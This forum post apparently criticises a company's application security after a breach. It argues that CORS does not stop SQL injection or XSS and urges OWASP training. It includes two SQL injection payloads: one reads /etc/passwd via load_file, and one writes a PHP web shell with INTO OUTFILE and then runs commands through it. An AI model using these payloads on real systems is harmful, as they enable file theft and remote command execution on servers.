Sign up with Google
MagicDude4Eva
Banned
I think there is a difference between a defect which introduces degraded functionality and knowingly introducing a vulnerability. I suppose you have proper change management process in place and either your CAB did not understand the implications or it was not properly explained.
Then your framework or inhouse developed code is wrong. If a servlet is "not written" to accept GET and POST, you already have a fundamental problem here.
No, it is a misconception that CORS is will protect you from attacks. In your scenario it is quite easy to do a simple SQL injection attack which allows an attacker to exploit your framework and inject javascript code into your database. When the data is rendered back to the browser (it is running now same-origin), the attacker will be able to steal any users session data, cookies etc. Once you have been exposed with XSS, content will be served from the same CORS origin.
You are misguided - an attacker does not need to have exec permissions on a file system - two examples:
If the backend runs MySQL, the load_file function allows me to load any external file as long as I have permission. In most cases HTTPD is run as root, so this is easy:
Code:
/backend.php?id=1' UNION select 2, load_file("/etc/passwd")'An attacker will also attempt to exploit your app and attempt to write to the file-system - like this:
Code:
/backend.php?id=1' UNION select 2, "<?php system($_REQUEST['cmd']); ?>" INTO OUTFILE '/var/www/html/uploads/c.php
and then http://YOURSERVER/uploads/c.php?cmd=ls -l /None of the above is very difficult. A script-kiddie will use sqlmap and just run a targeted SLI attack. A more sophisticated hacker will not even use those tools. I think your IT-/development-team needs to undergo some serious application security training.
From what I have seen, your system was severely compromised and you might not even know what was taken. I would honestly be more concerned about this and would have taken more dramatic measures (i.e. taking the system down until you are absolutely certain that you can offer secure transactions).
As a head start I suggest get your technical team to read through the OWASP top 10 (https://www.owasp.org/index.php/Top_10_2013-Top_10) - in your case you fail at least 8 out of the 10 which is highly concerning.
